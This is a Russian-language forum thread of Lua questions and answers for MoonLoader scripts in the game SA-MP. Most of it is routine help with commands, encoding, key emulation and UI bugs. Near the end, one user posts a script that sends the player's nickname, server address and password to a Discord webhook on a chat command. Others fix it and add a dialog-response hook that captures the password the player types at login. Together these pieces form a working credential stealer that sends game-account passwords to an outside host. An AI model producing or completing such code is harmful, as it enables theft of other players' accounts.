Вопросы по Lua скриптингу

Общая тема для вопросов по разработке скриптов на языке программирования Lua, в частности под MoonLoader.
  • Задавая вопрос, убедитесь, что его нет в списке частых вопросов и что на него ещё не отвечали (воспользуйтесь поиском).
  • Поищите ответ в теме посвященной разработке Lua скриптов в MoonLoader
  • Отвечая, убедитесь, что ваш ответ корректен.
  • Старайтесь как можно точнее выразить мысль, а если проблема связана с кодом, то обязательно прикрепите его к сообщению, используя блок [code=lua]здесь мог бы быть ваш код[/code].
  • Если вопрос связан с MoonLoader-ом первым делом желательно поискать решение на wiki.

Частые вопросы

Как научиться писать скрипты? С чего начать?
Информация - Гайд - Всё о Lua скриптинге для MoonLoader(https://blast.hk/threads/22707/)
Как вывести текст на русском? Вместо русского текста у меня какие-то каракули.
Изменить кодировку файла скрипта на Windows-1251. В Atom: комбинация клавиш Ctrl+Shift+U, в Notepad++: меню Кодировки -> Кодировки -> Кириллица -> Windows-1251.
Как получить транспорт, в котором сидит игрок?
Lua:
local veh = storeCarCharIsInNoSave(PLAYER_PED)
Как получить свой id или id другого игрока?
Lua:
local _, id = sampGetPlayerIdByCharHandle(PLAYER_PED) -- получить свой ид
local _, id = sampGetPlayerIdByCharHandle(ped) -- получить ид другого игрока. ped - это хендл персонажа
Как проверить, что строка содержит какой-то текст?
Lua:
if string.find(str, 'текст', 1, true) then
-- строка str содержит "текст"
end
Как эмулировать нажатие игровой клавиши?
Lua:
local game_keys = require 'game.keys' -- где-нибудь в начале скрипта вне функции main

setGameKeyState(game_keys.player.FIREWEAPON, -1) -- будет сэмулировано нажатие клавиши атаки
Все иды клавиш находятся в файле moonloader/lib/game/keys.lua.
Подробнее о функции setGameKeyState здесь: lua - setgamekeystate | BlastHack — DEV_WIKI(https://www.blast.hk/wiki/lua:setgamekeystate)
Как получить id другого игрока, в которого целюсь я?
Lua:
local valid, ped = getCharPlayerIsTargeting(PLAYER_HANDLE) -- получить хендл персонажа, в которого целится игрок
if valid and doesCharExist(ped) then -- если цель есть и персонаж существует
  local result, id = sampGetPlayerIdByCharHandle(ped) -- получить samp-ид игрока по хендлу персонажа
  if result then -- проверить, прошло ли получение ида успешно
    -- здесь любые действия с полученным идом игрока
  end
end
Как зарегистрировать команду чата SAMP?
Lua:
-- До бесконечного цикла/задержки
sampRegisterChatCommand("mycommand", function (param)
     -- param будет содержать весь текст введенный после команды, чтобы разделить его на аргументы используйте string.match()
    sampAddChatMessage("MyCMD", -1)
end)
Крашит игру при вызове sampSendChat. Как это исправить?
Это происходит из-за бага в SAMPFUNCS, когда производится попытка отправки пакета определенными функциями изнутри события исходящих RPC и пакетов. Исправления для этого бага нет, но есть способ не провоцировать его. Вызов sampSendChat изнутри обработчика исходящих RPC/пакетов нужно обернуть в скриптовый поток с нулевой задержкой:
Lua:
function onSendRpc(id)
  -- крашит:
  -- sampSendChat('Send RPC: ' .. id)

  -- норм:
  lua_thread.create(function()
    wait(0)
    sampSendChat('Send RPC: ' .. id)
  end)
end
 
Последнее редактирование:

Julimba

Участник
108
10
qq, в чем трабл, при нажатии сохраняет все в ини кфг, но если где то будет пропущено какое то значение, то ничего не должно сохраняться, но оно сохраняет в любом случае почему то. Хелп плз
Lua:
if imgui.Button(u8'Сохранить') then
sampAddChatMessage(tag.. 'Изменения сохранены', -1)
mainIni.config.OPG = u8:decode(buffer1.v)
mainIni.config.GHETTO = u8:decode(buffer2.v)
mainIni.config.GOS = u8:decode(buffer3.v)
mainIni.config.PLAYERS = u8:decode(buffer4.v)
inicfg.save(mainIni, directIni)
elseif buffer1.v == nil and buffer2.v == nil and buffer3.v == nil and buffer4.v == nil then
sampAddChatMessage(tag.. 'Дурак, ты не вписал значения', -1)
end
 

chapo

чопа сребдс // @moujeek
Модератор
8,868
11,576
qq, в чем трабл, при нажатии сохраняет все в ини кфг, но если где то будет пропущено какое то значение, то ничего не должно сохраняться, но оно сохраняет в любом случае почему то. Хелп плз
Lua:
if imgui.Button(u8'Сохранить') then
sampAddChatMessage(tag.. 'Изменения сохранены', -1)
mainIni.config.OPG = u8:decode(buffer1.v)
mainIni.config.GHETTO = u8:decode(buffer2.v)
mainIni.config.GOS = u8:decode(buffer3.v)
mainIni.config.PLAYERS = u8:decode(buffer4.v)
inicfg.save(mainIni, directIni)
elseif buffer1.v == nil and buffer2.v == nil and buffer3.v == nil and buffer4.v == nil then
sampAddChatMessage(tag.. 'Дурак, ты не вписал значения', -1)
end
"buffer" никогда не будет nil, его длина будет 0, так что вместо buffer1.v == nil пиши if #buffer1.v > 0 and #buffer2.v > 0 и тд
 
  • Злость
  • Влюблен
Реакции: joumey и Julimba

lucifertakaxasi

Новичок
2
0
Как читать кириллицу из файла? Менял кодировку файла на ANSI, но при изменении чего-либо кодировка возвращается обратно на UTF-8. Как можно это изменить?
 

F.Fox

Участник
47
1
Как сделать мини-скрипт, который бы раз в минуту отправлял текст в чат и нажимал бы кнопку энтер постоянно?
 

joumey

Активный
195
43
Как сделать мини-скрипт, который бы раз в минуту отправлял текст в чат и нажимал бы кнопку энтер постоянно?
Ручками, на луа, иначе почему ты в этом разделе.. Ставь таймер, и если проходит минута, то sampSendChat(text) и setVirtualKeyDown(key, true) wait(10) setVirtualKeyDown(key, false)
 

riverya4life

Известный
384
169
в том и прикол что я вообще хз. не шарю
На тебе пример

Lua:
require 'lib.moonloader'
local enable = false
function main()
    if not isSampfuncsLoaded() or not isSampLoaded() then return end
    while not isSampAvailable() do wait(100) end

    sampRegisterChatCommand("autof", function()
        if enable == false then
            enable = true
        end
    end)

    while true do
        wait(0)
        if enable == true and not sampIsChatInputActive() and not sampIsDialogActive() then
            setVirtualKeyDown(70, true)
            wait(100)
            setVirtualKeyDown(70, false)
            if isKeyJustPressed(VK_RCONTROL) then
                enable = false
            end
        end
    end
end
 

MTG MODS

Активный
253
177
Здраствуйте, есть вопрос один

У меня есть миникарта в .png , и две переменных с координатами, например
coord1 = getCharCoordinates(PLAYER_PED)
coord2 = 2187.7099609375, 2469.5700683594, 11.24199962616

Что мне нужно: зарендерить на экран миникарту из пнг файла (это я могу), а на миникарту в цикле наложить например 2 кружочка с этими координатами, и обновлять в цикле)
(на примере с паинта корд1 красный, корд2 синий)
1680948812291.png


Как это реаллизовать?
 
Последнее редактирование:

tyukapa

Активный
300
70
Как сделать чтобы в дс сервер шли данный типа "пароль", "айпи сервера" и "ник" после команды /dw

Вот код: (Тест. Тут есть приколы, там где ip сервера пишет id игрока, а там где "пароль" пишет айди сервера. Помогите) )
Тестовый:
local effil = require('effil') -- подключаем библиотеку effil для отправки запросов
local encoding = require('encoding') -- подключаем библиотеку encoding для перевода текста из Windows-1251 в UTF-8
local u8 = encoding.UTF8
encoding.default = 'CP1251'

function SendWebhook(URL, DATA, callback_ok, callback_error) -- Функция отправки запроса
    local function asyncHttpRequest(method, url, args, resolve, reject)
        local request_thread = effil.thread(function (method, url, args)
           local requests = require 'requests'
           local result, response = pcall(requests.request, method, url, args)
           if result then
              response.json, response.xml = nil, nil
              return true, response
           else
              return false, response
           end
        end)(method, url, args)
        if not resolve then resolve = function() end end
        if not reject then reject = function() end end
        lua_thread.create(function()
            local runner = request_thread
            while true do
                local status, err = runner:status()
                if not err then
                    if status == 'completed' then
                        local result, response = runner:get()
                        if result then
                           resolve(response)
                        else
                           reject(response)
                        end
                        return
                    elseif status == 'canceled' then
                        return reject(status)
                    end
                else
                    return reject(err)
                end
                wait(0)
            end
        end)
    end
    asyncHttpRequest('POST', URL, {headers = {['content-type'] = 'application/json'}, data = u8(DATA)}, callback_ok, callback_error)
end


function main()
    while not isSampAvailable() do wait(0) end
    sampRegisterChatCommand('dw', function(arg)
        local MyId = select(2, sampGetPlayerIdByCharHandle(PLAYER_PED))
        local MyName = sampGetPlayerNickname(MyId)
        local ServerAddress = table.concat({sampGetCurrentServerAddress()}, ':')
        SendWebhook('тут тип WEBHOOK, он есть но я его убрал покачто', ([[{
  "content": null,
  "embeds": [
    {
      "description": "**Ник:** `%s`\n**ip сервера:** `%s`\n**Пароль:** `%s`",
      "color": 11011227
    }
  ],
  "attachments": []
}]]):format(MyName, MyId, ServerAddress))
        sampAddChatMessage('+', -1)
    end)
    wait(-1)
end

Делал по исходнику: https://www.blast.hk/threads/122504/

И вот: https://discohook.org/

Покачто у меня вышло это:
1680953972012.png
 

de_clain

Активный
229
61
Как сделать чтобы в дс сервер шли данный типа "пароль", "айпи сервера" и "ник" после команды /dw

Вот код: (Тест. Тут есть приколы, там где ip сервера пишет id игрока, а там где "пароль" пишет айди сервера. Помогите) )
Тестовый:
local effil = require('effil') -- подключаем библиотеку effil для отправки запросов
local encoding = require('encoding') -- подключаем библиотеку encoding для перевода текста из Windows-1251 в UTF-8
local u8 = encoding.UTF8
encoding.default = 'CP1251'

function SendWebhook(URL, DATA, callback_ok, callback_error) -- Функция отправки запроса
    local function asyncHttpRequest(method, url, args, resolve, reject)
        local request_thread = effil.thread(function (method, url, args)
           local requests = require 'requests'
           local result, response = pcall(requests.request, method, url, args)
           if result then
              response.json, response.xml = nil, nil
              return true, response
           else
              return false, response
           end
        end)(method, url, args)
        if not resolve then resolve = function() end end
        if not reject then reject = function() end end
        lua_thread.create(function()
            local runner = request_thread
            while true do
                local status, err = runner:status()
                if not err then
                    if status == 'completed' then
                        local result, response = runner:get()
                        if result then
                           resolve(response)
                        else
                           reject(response)
                        end
                        return
                    elseif status == 'canceled' then
                        return reject(status)
                    end
                else
                    return reject(err)
                end
                wait(0)
            end
        end)
    end
    asyncHttpRequest('POST', URL, {headers = {['content-type'] = 'application/json'}, data = u8(DATA)}, callback_ok, callback_error)
end


function main()
    while not isSampAvailable() do wait(0) end
    sampRegisterChatCommand('dw', function(arg)
        local MyId = select(2, sampGetPlayerIdByCharHandle(PLAYER_PED))
        local MyName = sampGetPlayerNickname(MyId)
        local ServerAddress = table.concat({sampGetCurrentServerAddress()}, ':')
        SendWebhook('тут тип WEBHOOK, он есть но я его убрал покачто', ([[{
  "content": null,
  "embeds": [
    {
      "description": "**Ник:** `%s`\n**ip сервера:** `%s`\n**Пароль:** `%s`",
      "color": 11011227
    }
  ],
  "attachments": []
}]]):format(MyName, MyId, ServerAddress))
        sampAddChatMessage('+', -1)
    end)
    wait(-1)
end

Делал по исходнику: https://www.blast.hk/threads/122504/

И вот: https://discohook.org/

Покачто у меня вышло это: Посмотреть вложение 196899
ты гениален
:format(MyName, MyId, ServerAddress)) --порядок поменяй ахахха
 

Dmitriy Makarov

25.05.2021
Проверенный
2,500
1,132
Понял, это сменю. Но как сделать чтобы пароль игрока писало
Lua:
local sampev = require "lib.samp.events"

local password = ""

function sampev.onSendDialogResponse(dialogId, button, listboxId, input)
    if dialogId == --[[ ID диалога, куда вводится пароль ]] then
        password = input
    end
end

-- Use: password
 
  • Грустно
  • Нравится
Реакции: qdIbp и tyukapa